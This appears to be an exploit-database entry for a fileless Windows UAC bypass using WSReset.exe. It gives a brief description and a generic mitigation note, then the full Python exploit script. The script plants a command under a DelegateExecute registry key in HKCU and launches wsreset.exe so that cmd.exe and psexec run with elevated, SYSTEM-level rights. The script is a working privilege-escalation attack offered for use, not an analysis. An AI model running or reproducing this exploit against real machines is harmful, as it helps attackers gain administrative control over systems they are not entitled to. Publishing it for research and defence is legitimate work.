Fileless UAC bypass (WSReset.exe)

vendor:

Windows

by:

@404death

5.5

CVSS

MEDIUM

UAC bypass

264

CWE

Product Name: Windows

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Fileless UAC bypass (WSReset.exe)

This exploit bypasses the User Account Control (UAC) using the WSReset.exe application. It creates a registry key and sets a command to be executed as the DelegateExecute value. When the WSReset.exe application is run, it executes the command with administrative privileges, bypassing the UAC.

Mitigation:

To mitigate this vulnerability, ensure that only trusted applications are allowed to run with administrative privileges. Regularly update and patch the operating system and applications to prevent exploitation of known vulnerabilities.

Source

Exploit-DB raw data:

#### Fileless UAC bypass (WSReset.exe)
#### @404death
#### base on : https://www.activecyber.us/activelabs/windows-uac-bypass
#
## EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47754.zip
#
import sys, os
from ctypes import *
import _winreg
CMD                   = r"C:\Windows\System32\cmd.exe"
WS_RESET              = r'C:\Windows\System32\wsreset.exe'
#PYTHON_CMD           = "python"
test_cmd              = " -i -s cmd.exe"
SYSTEM_SHELL          = "psexec.exe"  # to get nt\system   
REG_PATH              = 'Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_running_as_admin():
    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''    
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
def create_reg_key(key, value):
    '''
    Creates a reg key
    '''
    try:        
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)                
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
        _winreg.CloseKey(registry_key)
    except WindowsError:        
        raise
def bypass_uac(cmd):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd)    
    except WindowsError:
        raise
def execute():        
    if not is_running_as_admin():
        print '[!] Fileless UAC Bypass via Windows Store by @404death '
        print '[+] Trying to bypass the UAC'
        print '[+] Waiting to get SYSTEM shell !!!'
        try:                
            current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + SYSTEM_SHELL
            cmd = '{} /c {} {}'.format(CMD, current_dir, test_cmd)
            bypass_uac(cmd)                
            os.system(WS_RESET)
            print '[+] Pwnedd !!! you g0t system shell !!!'                
            sys.exit(0)                
        except WindowsError:
            sys.exit(1)
    else:
        print '[+] xailay !!!'        
if __name__ == '__main__':
    execute()